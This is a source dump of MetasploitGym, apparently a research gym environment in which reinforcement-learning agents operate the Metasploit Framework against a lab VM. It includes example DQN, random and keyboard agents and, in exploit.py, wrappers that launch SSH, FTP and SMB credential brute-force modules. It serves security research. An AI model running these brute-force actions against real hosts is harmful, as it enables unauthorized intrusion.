├── LICENSE ├── README.md ├── examples ├── dqn_agent.py ├── keyboard_agent.py ├── models │ └── ScriptKiddie_low_lr_Episode_20.pt └── random_agent.py ├── metasploit_gym ├── __init__.py ├── action │ ├── __init__.py │ ├── action.py │ ├── exploit.py │ ├── privilege_escalation.py │ └── scan.py ├── host │ ├── network.py │ └── utils.py └── metasploit_env.py ├── pyproject.toml ├── requirements.txt └── tests ├── test_agent.py └── test_connection.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 phreakAI 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MetasploitGym 2 | 3 | MetasploitGym is a [gym](https://github.com/openai/gym) environment that lets RL agents use the [Metasploit Framework's](https://github.com/rapid7/metasploit-framework) RPC service (the `msgrpc` plugin, which speaks MessagePack RPC rather than gRPC) to interact with networks and single machines. 4 | 5 | **Note**: MetasploitGym is research code and under active development. Breaking changes are not just likely, but necessary to get the API where it needs to be. In fact, this will all probably be completely rewritten. 6 | 7 | `examples` features stubs for DeepQNetwork, Random, and Keyboard-driven agents. 8 | 9 | `tests` needs to be filled out. Currently it mostly checks that the RPC service didn't break. 10 | 11 | 12 | ### Requirements 13 | 14 | This software communicates with Metasploit over RPC. To do this, you need a running `msgrpc` service. I use a dockerfile for this, set up how I like it [here](https://github.com/SJCaldwell/dockerfile-msf) and based on [phocean's](https://github.com/phocean/dockerfile-msf) excellent work. 15 | 16 | Once the container is running, run the following commands: 17 | 18 | `./msfconsole` 19 | `load msgrpc Pass=[your_pass] ServerPort=[your_port] ServerHost=0.0.0.0 SSL=true` 20 | 21 | I've found that when running the msfrpcd service I cannot maintain a database connection; I'll work to determine why later. 22 | 23 | It's easier to test database changes directly through msfconsole anyway, so it's not the end of the world. 24 | 25 | MetasploitGym also assumes that `METASPLOIT_PASSWORD`, `METASPLOIT_PORT`, and `METASPLOIT_HOST` are set as environment variables it can use to connect to msgrpc. These correspond to `[your_pass]`, `[your_port]`, and the hostname of your RPC service above.
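A missing or malformed variable is easier to diagnose before the environment tries to connect. The following is a minimal sketch of such a check, not part of MetasploitGym itself: `MsfRpcSettings` and `load_msf_settings` are hypothetical names, and only the three variable names come from the text above.

```python
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class MsfRpcSettings:
    """Connection settings for the msgrpc service (hypothetical helper)."""

    password: str
    port: int
    host: str


def load_msf_settings(environ=os.environ):
    """Read the three variables named above and fail early if any is unset."""
    names = ("METASPLOIT_PASSWORD", "METASPLOIT_PORT", "METASPLOIT_HOST")
    missing = [name for name in names if not environ.get(name)]
    if missing:
        raise RuntimeError("Missing environment variables: " + ", ".join(missing))
    return MsfRpcSettings(
        password=environ["METASPLOIT_PASSWORD"],
        port=int(environ["METASPLOIT_PORT"]),  # raises ValueError if not numeric
        host=environ["METASPLOIT_HOST"],
    )
```

Calling `load_msf_settings()` with no arguments reads the real process environment; passing a plain dict makes the check easy to exercise in a test.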
26 | 27 | ### API 28 | 29 | During training, MetasploitGym runs many episodes and starts each one by calling `env.reset()`. To keep this general, *the client* must supply the code that resets its own environment. A VirtualBox sample that resets a single machine called `metasploitable` is included below. 30 | 31 | 32 | ```python 33 | import time 34 | import virtualbox 35 | 36 | def environment_reset(): 37 | start = time.time() 38 | name = "gym_episode_start" 39 | vb = virtualbox.VirtualBox() 40 | session = virtualbox.Session() 41 | try: 42 | vm = vb.find_machine("metasploitable") 43 | snap = vm.find_snapshot(name) 44 | vm.create_session(session=session) 45 | except Exception as e: 46 | print(str(e)) 47 | return False 48 | shutting_down = session.console.power_down() 49 | while shutting_down.operation_percent < 100: 50 | time.sleep(0.5) 51 | restoring = session.machine.restore_snapshot(snap) 52 | while restoring.operation_percent < 100: 53 | time.sleep(0.5) 54 | if restoring.completed == 1: 55 | print(f"Restored machine in {str(time.time() - start)} sec") 56 | vm = vb.find_machine("metasploitable") 57 | session = virtualbox.Session() 58 | vm.launch_vm_process(session, "gui", []) 59 | ``` 60 | However that code is written, as long as the function does not return until the environment is in a clean state, you're ready to use MetasploitGym. 61 | 62 | ```python 63 | import metasploit_gym 64 | 65 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 66 | reset_function=environment_reset, 67 | initial_target=target_host 68 | ) 69 | ``` 70 | By default the state space covers 1 subnet and 1 host. This can be changed with the `max_subnets` and `max_hosts_per_subnet` arguments. You can also define an initial target, which is where the agent starts.
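The only contract on `reset_function` is that it blocks until the target is clean, and a freshly launched VM may need extra time before its services accept connections. Below is a minimal sketch of a polling helper a reset function could end with. `wait_until` and `port_is_open` are hypothetical names, not part of MetasploitGym, and treating an open TCP port as "ready" is an assumption about your lab setup.

```python
import socket
import time


def wait_until(predicate, timeout=120.0, interval=0.5):
    """Poll predicate() until it returns True or `timeout` seconds elapse.

    The predicate is always checked at least once.
    """
    deadline = time.monotonic() + timeout
    while True:
        if predicate():
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval)


def port_is_open(host, port, connect_timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=connect_timeout):
            return True
    except OSError:
        return False
```

For example, a reset function could finish with `return wait_until(lambda: port_is_open(target_host, 22))`, where port 22 is only an illustration of a service you expect the restored machine to expose.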
71 | 72 | ### Release Notes 73 | MetasploitGym is under active development, and release notes will be stored in the [releases page](https://github.com/phreakai/metasploitgym/releases) on GitHub. 74 | -------------------------------------------------------------------------------- /examples/dqn_agent.py: -------------------------------------------------------------------------------- 1 | """Example 2 | """ 3 | import random 4 | import numpy as np 5 | import metasploit_gym 6 | import virtualbox 7 | import time 8 | 9 | import torch 10 | import torch.nn as nn 11 | import torch.optim as optim 12 | import torch.nn.functional as F 13 | from torch.utils.tensorboard import SummaryWriter 14 | 15 | 16 | class ReplayMemory: 17 | def __init__(self, capacity, s_dims, device="cpu"): 18 | self.capacity = capacity 19 | self.device = device 20 | self.s_buf = np.zeros((capacity, *s_dims), dtype=np.float32) 21 | self.a_buf = np.zeros((capacity, 1), dtype=np.int64) 22 | self.next_s_buf = np.zeros((capacity, *s_dims), dtype=np.float32) 23 | self.r_buf = np.zeros(capacity, dtype=np.float32) 24 | self.done_buf = np.zeros(capacity, dtype=np.float32) 25 | self.ptr, self.size = 0, 0 26 | 27 | def store(self, s, a, next_s, r, done): 28 | self.s_buf[self.ptr] = s 29 | self.a_buf[self.ptr] = a 30 | self.next_s_buf[self.ptr] = next_s 31 | self.r_buf[self.ptr] = r 32 | self.done_buf[self.ptr] = done 33 | self.ptr = (self.ptr + 1) % self.capacity 34 | self.size = min(self.size + 1, self.capacity) 35 | 36 | def sample_batch(self, batch_size): 37 | sample_idxs = np.random.choice(self.size, batch_size) 38 | batch = [ 39 | self.s_buf[sample_idxs], 40 | self.a_buf[sample_idxs], 41 | self.next_s_buf[sample_idxs], 42 | self.r_buf[sample_idxs], 43 | self.done_buf[sample_idxs], 44 | ] 45 | return [torch.from_numpy(buf).to(self.device) for buf in batch] 46 | 47 | 48 | class DQN(nn.Module): 49 | def __init__(self, input_dim, layers, num_actions): 50 | super().__init__() 51 | self.layers = 
nn.ModuleList([nn.Linear(input_dim[0] * input_dim[1], layers[0])]) 52 | for l in range(1, len(layers)): 53 | self.layers.append(nn.Linear(layers[l - 1], layers[l])) 54 | self.out = nn.Linear(layers[-1], num_actions) 55 | 56 | def forward(self, x): 57 | x = torch.flatten(x, start_dim=1) 58 | for layer in self.layers: 59 | x = F.relu(layer(x)) 60 | x = self.out(x) 61 | return x 62 | 63 | def save_model(self, file_path): 64 | torch.save(self.state_dict(), file_path) 65 | 66 | def load_model(self, file_path): 67 | self.load_state_dict(torch.load(file_path)) 68 | 69 | def get_action(self, x): 70 | x = x.unsqueeze(0) # add batch dimension 71 | with torch.no_grad(): 72 | if len(x.shape) == 1: 73 | x = x.view(1, -1) 74 | return self.forward(x).max(1)[1] 75 | 76 | 77 | class DQNAgent: 78 | """A simple Deep Q-Network Agent""" 79 | 80 | def __init__( 81 | self, 82 | env, 83 | seed=42, 84 | lr=0.0001, 85 | training_steps=100, 86 | batch_size=32, 87 | replay_size=1000, 88 | final_epsilon=0.05, 89 | exploration_steps=50, 90 | gamma=0.99, 91 | hidden_sizes=[64, 64], 92 | target_update_freq=10, 93 | verbose=True, 94 | **kwargs, 95 | ): 96 | self.verbose = verbose 97 | self.seed = seed 98 | np.random.seed(self.seed) 99 | 100 | self.env = env 101 | 102 | self.num_actions = self.env.action_space.n 103 | self.obs_dim = self.env.observation_space.shape 104 | 105 | self.logger = SummaryWriter() 106 | 107 | self.lr = lr 108 | self.exploration_steps = exploration_steps 109 | self.final_epsilon = final_epsilon 110 | self.epsilon_schedule = np.linspace( 111 | 1.0, self.final_epsilon, self.exploration_steps 112 | ) 113 | 114 | self.batch_size = batch_size 115 | self.discount = gamma 116 | self.training_steps = training_steps 117 | self.steps_done = 0 118 | 119 | # Neural networks related attributes 120 | self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") 121 | self.dqn = DQN(self.obs_dim, hidden_sizes, self.num_actions).to(self.device) 122 | 123 | self.target_dqn =
DQN(self.obs_dim, hidden_sizes, self.num_actions).to( 124 | self.device 125 | ) 126 | 127 | self.target_update_freq = target_update_freq 128 | 129 | self.optimizer = optim.Adam(self.dqn.parameters(), lr=self.lr) 130 | self.loss_fn = nn.SmoothL1Loss() 131 | 132 | # replay setup 133 | self.replay = ReplayMemory(replay_size, self.obs_dim, self.device) 134 | 135 | def save(self, file_path): 136 | self.dqn.save_model(file_path) 137 | 138 | def load(self, file_path): 139 | self.dqn.load_model(file_path) 140 | 141 | def get_epsilon(self): 142 | if self.steps_done < self.exploration_steps: 143 | return self.epsilon_schedule[self.steps_done] 144 | return self.final_epsilon 145 | 146 | def get_egreedy_action(self, o, epsilon): 147 | if random.random() > epsilon: 148 | o = torch.from_numpy(o).float().to(self.device) 149 | return self.dqn.get_action(o).cpu().item() 150 | return random.randint(0, self.num_actions - 1) 151 | 152 | def optimize(self): 153 | batch = self.replay.sample_batch(self.batch_size) 154 | s_batch, a_batch, next_s_batch, r_batch, d_batch = batch 155 | q_vals_raw = self.dqn(s_batch) 156 | q_vals = q_vals_raw.gather(1, a_batch) 157 | 158 | with torch.no_grad(): 159 | target_q_val_raw = self.target_dqn(next_s_batch) 160 | target_q_val = target_q_val_raw.max(1)[0] 161 | target = r_batch + self.discount * (1 - d_batch) * target_q_val 162 | 163 | # calculate loss 164 | q_vals = q_vals.view(-1) 165 | 166 | loss = self.loss_fn(q_vals, target) 167 | 168 | # optimize the model 169 | self.optimizer.zero_grad() 170 | loss.backward() 171 | self.optimizer.step() 172 | 173 | if self.steps_done % self.target_update_freq == 0: 174 | self.target_dqn.load_state_dict(self.dqn.state_dict()) 175 | 176 | q_vals_max = q_vals_raw.max(1)[0] 177 | mean_v = q_vals_max.mean().item() 178 | return loss.item(), mean_v 179 | 180 | def train(self): 181 | num_episodes = 0 182 | training_steps_remaining = self.training_steps 183 | 184 | while self.steps_done < self.training_steps: 185 | 
ep_results = self.run_train_episode(10) 186 | ep_return, ep_steps, goal = ep_results 187 | num_episodes += 1 188 | training_steps_remaining -= ep_steps 189 | 190 | self.logger.add_scalar("episode", num_episodes, self.steps_done) 191 | self.logger.add_scalar("epsilon", self.get_epsilon(), self.steps_done) 192 | self.logger.add_scalar("episode_return", ep_return, self.steps_done) 193 | self.logger.add_scalar("episode_goal_reached", int(goal), self.steps_done) 194 | 195 | if num_episodes % 10 == 0 and self.verbose: 196 | print(f"\nEpisode {num_episodes}:") 197 | print(f"\tsteps done = {self.steps_done} / {self.training_steps}") 198 | print(f"\treturn = {ep_return}") 199 | print(f"\tgoal = {goal}") 200 | self.dqn.save_model( 201 | f"models/ScriptKiddie_low_lr_Episode_{num_episodes}.pt" 202 | ) 203 | self.logger.close() 204 | if self.verbose: 205 | print("Training complete") 206 | print(f"\nEpisode {num_episodes}:") 207 | print(f"\tsteps done = {self.steps_done} / {self.training_steps}") 208 | print(f"\treturn = {ep_return}") 209 | print(f"\tgoal = {goal}") 210 | 211 | def run_train_episode(self, step_limit): 212 | o = self.env.reset() 213 | done = False 214 | 215 | steps = 0 216 | episode_return = 0 217 | print("STARTING EPISODE") 218 | print(f"Step limit = {step_limit}") 219 | 220 | while not done and steps < step_limit: 221 | a = self.get_egreedy_action(o, self.get_epsilon()) 222 | action = self.env.action_space.get_action(a) 223 | next_o, r, done, _ = self.env.step(action) 224 | print(f"ACTION REWARD {r}") 225 | self.replay.store(o, a, next_o, r, done) 226 | self.steps_done += 1 227 | loss, mean_v = self.optimize() 228 | self.logger.add_scalar("loss", loss, self.steps_done) 229 | self.logger.add_scalar("mean_v", mean_v, self.steps_done) 230 | 231 | o = next_o 232 | episode_return += r 233 | steps += 1 234 | print("ENDING EPISODE") 235 | return episode_return, steps, self.env.goal_reached() 236 | 237 | def run_eval_episode( 238 | self, env=None, render=False,
eval_epsilon=0.05, render_mode="readable" 239 | ): 240 | if env is None: 241 | env = self.env 242 | o = env.reset() 243 | done = False 244 | 245 | steps = 0 246 | episode_return = 0 247 | 248 | line_break = "=" * 60 249 | if render: 250 | print("\n" + line_break) 251 | print(f"Running EVALUATION using epsilon = {eval_epsilon:.4f}") 252 | print(line_break) 253 | env.render(render_mode) 254 | input("Initial state. Press enter to continue..") 255 | 256 | while not done: 257 | a = self.get_egreedy_action(o, eval_epsilon) 258 | action = env.action_space.get_action(a) 259 | next_o, r, done, _ = env.step(action) 260 | o = next_o 261 | episode_return += r 262 | steps += 1 263 | if render: 264 | print("\n" + line_break) 265 | print(f"Steps {steps}") 266 | print(line_break) 267 | print(f"Action performed = {env.action_space.get_action(a)}") 268 | env.render(render_mode) 269 | print(f"Reward = {r}") 270 | print(f"Done = {done}") 271 | input("Press enter to continue.") 272 | 273 | if done: 274 | print("\n" + line_break) 275 | print("EPISODE FINISHED") 276 | print(line_break) 277 | print(f"Goal reached = {env.goal_reached()}") 278 | print(f"Total steps = {steps}") 279 | print(f"Total reward = {episode_return}") 280 | return episode_return, steps, env.goal_reached() 281 | 282 | 283 | if __name__ == "__main__": 284 | import argparse 285 | 286 | parser = argparse.ArgumentParser() 287 | parser.add_argument( 288 | "--render_eval", action="store_true", help="Renders final policy" 289 | ) 290 | parser.add_argument( 291 | "--hidden_sizes", 292 | type=int, 293 | nargs="*", 294 | default=[64, 64], 295 | help="(default=[64. 
64])", 296 | ) 297 | parser.add_argument( 298 | "--lr", type=float, default=0.001, help="Learning rate (default=0.001)" 299 | ) 300 | parser.add_argument( 301 | "-t", 302 | "--training_steps", 303 | type=int, 304 | default=200, 305 | help="training steps (default=200)", 306 | ) 307 | parser.add_argument("--batch_size", type=int, default=32, help="(default=32)") 308 | parser.add_argument( 309 | "--target_update_freq", type=int, default=1000, help="(default=1000)" 310 | ) 311 | parser.add_argument("--seed", type=int, default=0, help="(default=0)") 312 | parser.add_argument("--replay_size", type=int, default=1000, help="(default=1000)") 313 | parser.add_argument( 314 | "--final_epsilon", type=float, default=0.05, help="(default=0.05)" 315 | ) 316 | parser.add_argument("--init_epsilon", type=float, default=1.0, help="(default=1.0)") 317 | parser.add_argument( 318 | "--exploration_steps", type=int, default=10000, help="(default=10000)" 319 | ) 320 | parser.add_argument("--gamma", type=float, default=0.99, help="(default=0.99)") 321 | parser.add_argument("--quiet", "--quite", dest="quite", action="store_false", help="Run in quiet mode") 322 | args = parser.parse_args() 323 | 324 | def environment_reset(): 325 | start = time.time() 326 | name = "gym_episode_start" 327 | vb = virtualbox.VirtualBox() 328 | session = virtualbox.Session() 329 | try: 330 | vm = vb.find_machine("metasploitable") 331 | snap = vm.find_snapshot(name) 332 | vm.create_session(session=session) 333 | except virtualbox.library.VBoxError as e: 334 | print(e.msg) 335 | return True 336 | except Exception as e: 337 | print(str(e)) 338 | return True 339 | shutting_down = session.console.power_down() 340 | while shutting_down.operation_percent < 100: 341 | time.sleep(0.5) 342 | restoring = session.machine.restore_snapshot(snap) 343 | while restoring.operation_percent < 100: 344 | time.sleep(0.5) 345 | vm = vb.find_machine("metasploitable") 346 | session = virtualbox.Session() 347 | proc = vm.launch_vm_process(session, "gui", [])
348 | proc.wait_for_completion(timeout=-1) 349 | return True 350 | 351 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 352 | reset_function=environment_reset 353 | ) 354 | dqn_agent = DQNAgent(env, verbose=args.quite, **vars(args)) 355 | dqn_agent.train() 356 | dqn_agent.run_eval_episode(render=args.render_eval) 357 | -------------------------------------------------------------------------------- /examples/keyboard_agent.py: -------------------------------------------------------------------------------- 1 | """An agent for interacting with the MetasploitGym environment using the keyboard. 2 | 3 | To see available arguments, run python keyboard_agent --help 4 | """ 5 | import numpy as np 6 | import metasploit_gym 7 | 8 | LINE_BREAK = "-" * 60 9 | LINE_BREAK_2 = "=" * 60 10 | 11 | 12 | def choose_host(env): 13 | host_list = [host for host in env.host_dict.keys()] 14 | while True: 15 | try: 16 | print("KNOWN HOSTS:") 17 | for i in range(len(host_list)): 18 | print(f"[{str(i)}] IP: {host_list[i]}") 19 | idx = int(input("Please enter a number:")) 20 | return host_list[idx] 21 | except Exception: 22 | print("Invalid choice. Please select one of the numbered options") 23 | 24 | 25 | def choose_action_for_host(env, ip_address): 26 | target_actions = [] 27 | target = env.host_dict[ip_address] 28 | for action in env.action_space.actions: 29 | if action.target == target: 30 | target_actions.append(action) 31 | while True: 32 | try: 33 | print("ACTIONS ON HOST") 34 | for i in range(len(target_actions)): 35 | print(f"[{str(i)}] : action {target_actions[i].name}") 36 | idx = int(input("Please enter a number:")) 37 | return target_actions[idx] 38 | except Exception: 39 | print("Invalid choice. 
Please select one of the numbered options") 40 | 41 | 42 | def run_keyboard_agent(env, step_limit=2, verbose=True): 43 | print(LINE_BREAK) 44 | print("STARTING EPISODE:") 45 | 46 | env.reset() 47 | total_reward = 0 48 | done = False 49 | t = 0 50 | 51 | while not done and t < step_limit: 52 | ip_address = choose_host(env) 53 | a = choose_action_for_host(env, ip_address) 54 | _, r, done, _ = env.step(a) 55 | print(r) 56 | total_reward += r 57 | if (t + 1) % 20 == 0 and verbose: 58 | print(f"t: {t}: reward: {total_reward}") 59 | t += 1 60 | 61 | if done and verbose: 62 | print(LINE_BREAK) 63 | print("EPISODE COMPLETE") 64 | print(LINE_BREAK) 65 | print(f"Total steps = {t}") 66 | print(f"Total reward = {total_reward}") 67 | return t, total_reward, done 68 | 69 | 70 | if __name__ == "__main__": 71 | import argparse 72 | 73 | parser = argparse.ArgumentParser() 74 | parser.add_argument("-s", "--seed", type=int, default=0, help="random seed") 75 | parser.add_argument( 76 | "-r", 77 | "--runs", 78 | type=int, 79 | default=1, 80 | help="Number of runs to perform (default=1)", 81 | ) 82 | args = parser.parse_args() 83 | run_steps = [] 84 | run_rewards = [] 85 | run_goals = 0 86 | 87 | def environment_reset(): 88 | raise NotImplementedError("Reset your network with this function") 89 | 90 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 91 | reset_function=environment_reset 92 | ) 93 | for i in range(args.runs): 94 | steps, reward, done = run_keyboard_agent(env, step_limit=2, verbose=True) 95 | run_steps.append(steps) 96 | run_rewards.append(reward) 97 | run_steps = np.array(run_steps) 98 | run_rewards = np.array(run_rewards) 99 | 100 | print(f"Mean steps = {run_steps.mean():.2f} +/- {run_steps.std():.2f}") 101 | print(f"Mean rewards = {run_rewards.mean():.2f} " f"+/- {run_rewards.std():.2f}") 102 | -------------------------------------------------------------------------------- /examples/models/ScriptKiddie_low_lr_Episode_20.pt:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/phreakAI/metasploit-gym/128b977ccebbbb026784cba0ecd82182fdfb0cdb/examples/models/ScriptKiddie_low_lr_Episode_20.pt -------------------------------------------------------------------------------- /examples/random_agent.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import metasploit_gym 3 | import time 4 | import time 5 | 6 | LINE_BREAK = "-" * 60 7 | 8 | 9 | def run_random_agent(env, step_limit=10, verbose=True): 10 | if verbose: 11 | print(LINE_BREAK) 12 | print("STARTING EPISODE") 13 | print(LINE_BREAK) 14 | # reset environment from last episode 15 | env.reset() 16 | total_reward = 0 17 | done = False 18 | t = 0 19 | start = time.time() 20 | action_count = 0 21 | while not done and t < step_limit: 22 | a = env.action_space.sample() 23 | a = env.action_space.get_action(a) 24 | print(a) 25 | _, r, done, _ = env.step(a) 26 | if done: 27 | print("DONE AT") 28 | print(t) 29 | return t, total_reward, env.goal_reached() 30 | if action_count == 256: 31 | stop = time.time() 32 | print("To collect 256 time steps requires: ") 33 | print(stop - start) 34 | total_reward += r 35 | if (t + 1) % 20 == 0 and verbose: 36 | print(f"t: {t}: reward:{total_reward}") 37 | t += 1 38 | 39 | if done and verbose: 40 | print(LINE_BREAK) 41 | print("EPISODE COMPLETE") 42 | print(LINE_BREAK) 43 | print(f"Total steps = {t}") 44 | print(f"Total reward = {total_reward}") 45 | elif verbose: 46 | print(LINE_BREAK) 47 | print("STEP LIMIT REACHED") 48 | print(LINE_BREAK) 49 | return t, total_reward, env.goal_reached() 50 | 51 | 52 | if __name__ == "__main__": 53 | import argparse 54 | 55 | parser = argparse.ArgumentParser() 56 | parser.add_argument("-s", "--seed", type=int, default=0, help="random seed") 57 | parser.add_argument( 58 | "-r", 59 | "--runs", 60 | type=int, 61 | default=20, 62 | help="Number of random runs to 
perform (default=20)", 63 | ) 64 | args = parser.parse_args() 65 | run_steps = [] 66 | run_rewards = [] 67 | run_goals = 0 68 | 69 | def environment_reset(): 70 | raise NotImplementedError("Reset your environment with this function") 71 | 72 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 73 | reset_function=environment_reset 74 | ) 75 | for i in range(args.runs): 76 | steps, reward, done = run_random_agent(env, step_limit=5, verbose=True) 77 | run_steps.append(steps) 78 | run_rewards.append(reward) 79 | if done: 80 | run_goals += 1 81 | run_steps = np.array(run_steps) 82 | run_rewards = np.array(run_rewards) 83 | 84 | print(f"Mean steps = {run_steps.mean():.2f} +/- {run_steps.std():.2f}") 85 | print(f"Mean rewards = {run_rewards.mean():.2f} " f"+/- {run_rewards.std():.2f}") 86 | print(run_goals) 87 | print("out of") 88 | print(args.runs) 89 | -------------------------------------------------------------------------------- /metasploit_gym/__init__.py: -------------------------------------------------------------------------------- 1 | from gym.envs.registration import register 2 | 3 | from .metasploit_env import MetasploitNetworkEnv, MetasploitSimulatorEnv 4 | 5 | environments = [["MetasploitNetworkEnv", "v0"], ["MetasploitSimulatorEnv", "v0"]] 6 | 7 | 8 | for environment in environments: 9 | register( 10 | id=f"{environment[0]}-{environment[1]}", 11 | entry_point=f"metasploit_gym:{environment[0]}", 12 | nondeterministic=True, 13 | ) 14 | -------------------------------------------------------------------------------- /metasploit_gym/action/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phreakAI/metasploit-gym/128b977ccebbbb026784cba0ecd82182fdfb0cdb/metasploit_gym/action/__init__.py -------------------------------------------------------------------------------- /metasploit_gym/action/action.py: -------------------------------------------------------------------------------- 1
| """Action related classes for the MetasploitGym environment. 2 | 3 | This module contains the different action classes that are used 4 | to represent a subset of the abilities available to the metasploit API, along 5 | with the different ActionSpace and ActionResult classes. 6 | """ 7 | 8 | class Action(object): 9 | """The base action class for the environment. 10 | 11 | There are multiple types of actions. We consider exploits, scans, privilege escalations. 12 | """ 13 | 14 | def __init__(self, name, target, req_access, req_os, req_version, **kwargs): 15 | """ 16 | Args: 17 | name (str): name of action 18 | target (int, int): address of target (subnet, host) 19 | req_access (AccessLevel), optional: required access level to perform the action 20 | req_os (OperatingSystem), optional: required OS to perform the action 21 | req_version (RequiredVersion), optional: required version number 22 | """ 23 | self.name = name 24 | self.target = target 25 | self.req_access = req_access 26 | self.req_os = req_os 27 | self.req_version = req_version 28 | 29 | def is_exploit(self): 30 | """Check if action is exploit""" 31 | return isinstance(self, Exploit) 32 | 33 | def is_scan(self): 34 | """Check if action is scan""" 35 | return isinstance(self, Scan) 36 | 37 | def is_privilege_escalation(self): 38 | """Check if action is privilege escalation""" 39 | return isinstance(self, PrivilegeEscalation) 40 | 41 | def is_no_op(self): 42 | """Check if action is a no-op""" 43 | return isinstance(self, NoOp) 44 | 45 | def is_remote(self): 46 | """Check if action is remote.
An action 47 | is remote if it's not being run from a process on the local 48 | machine""" 49 | return isinstance(self, (Scan, Exploit)) 50 | 51 | def execute(self): 52 | """ 53 | Execute the action 54 | """ 55 | raise NotImplementedError 56 | 57 | 58 | class Exploit(Action): 59 | def __init__(self): 60 | super().__init__( 61 | self.name, self.target, self.req_access, self.req_os, self.req_version 62 | ) 63 | 64 | 65 | class Scan(Action): 66 | def __init__(self): 67 | raise NotImplementedError 68 | 69 | 70 | class PrivilegeEscalation(Action): 71 | def __init__(self): 72 | raise NotImplementedError 73 | 74 | 75 | class NoOp(Action): 76 | def __init__(self): 77 | raise NotImplementedError 78 | -------------------------------------------------------------------------------- /metasploit_gym/action/exploit.py: -------------------------------------------------------------------------------- 1 | """Exploits currently supported 2 | Straightforward to add more following the basic model presented here 3 | """ 4 | from .action import Exploit 5 | import time 6 | 7 | 8 | def wait_for_job_completion(job_info, client): 9 | if job_info is not None: 10 | if "error" in job_info: 11 | return 12 | job_is_running = True 13 | while job_is_running: 14 | job_id = job_info["uuid"] 15 | results = client.jobs.info_by_uuid(job_id) 16 | if "error" in results: 17 | return 18 | if results["status"] == "completed": 19 | job_is_running = False 20 | else: 21 | time.sleep(1) 22 | 23 | 24 | class SSH_Bruteforce(Exploit): 25 | """port 22 bruteforce 26 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb 27 | """ 28 | 29 | def __init__(self, target=(0, 0)): 30 | self.name = "SSH_Bruteforce" 31 | self.service = "ssh" 32 | self.target = target 33 | self.req_access = None 34 | self.req_os = None 35 | self.req_version = None 36 | super(Exploit, self).__init__( 37 | self.name, self.target, self.req_access, self.req_os, self.req_version 38 | ) 39 | 40 | def
execute(self, client, host, port=22): 41 | """ 42 | :param client: metasploit client object 43 | :param host: string representing IP of the target 44 | :param port: default port 22 45 | :return: 46 | """ 47 | exploit = client.modules.use("auxiliary", "scanner/ssh/ssh_login") 48 | exploit["RHOSTS"] = host 49 | exploit["RPORT"] = port 50 | # TODO: This should be detected based on metasploit rpc server 51 | exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists" 52 | job_info = exploit.execute() 53 | wait_for_job_completion(job_info, client) 54 | 55 | 56 | class FTP_Bruteforce(Exploit): 57 | """port 21 bruteforce 58 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb 59 | """ 60 | 61 | def __init__(self, target=(0, 0)): 62 | self.name = "FTP_Bruteforce" 63 | self.service = "ftp" 64 | self.target = target 65 | self.req_access = None 66 | self.req_os = None 67 | self.req_version = None 68 | super(Exploit, self).__init__( 69 | self.name, self.target, self.req_access, self.req_os, self.req_version 70 | ) 71 | 72 | def execute(self, client, host, port=21): 73 | """ 74 | :param client: metasploit client object 75 | :param host: string representing IP of the target 76 | :param port: default port 21 77 | :return: 78 | """ 79 | exploit = client.modules.use("auxiliary", "scanner/ftp/ftp_login") 80 | exploit["RHOSTS"] = host 81 | exploit["RPORT"] = port 82 | # TODO: This should be detected based on metasploit rpc server 83 | exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists" 84 | job_info = exploit.execute() 85 | wait_for_job_completion(job_info, client) 86 | 87 | 88 | class SMB_Bruteforce(Exploit): 89 | """ 90 | port 445 bruteforce 91 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_login.rb 92 | """ 93 | 94 | def __init__(self, target=(0, 0)): 95 | self.name = "SMB_Bruteforce" 96 | self.service = "Microsoft-DS" 97 | self.target = target
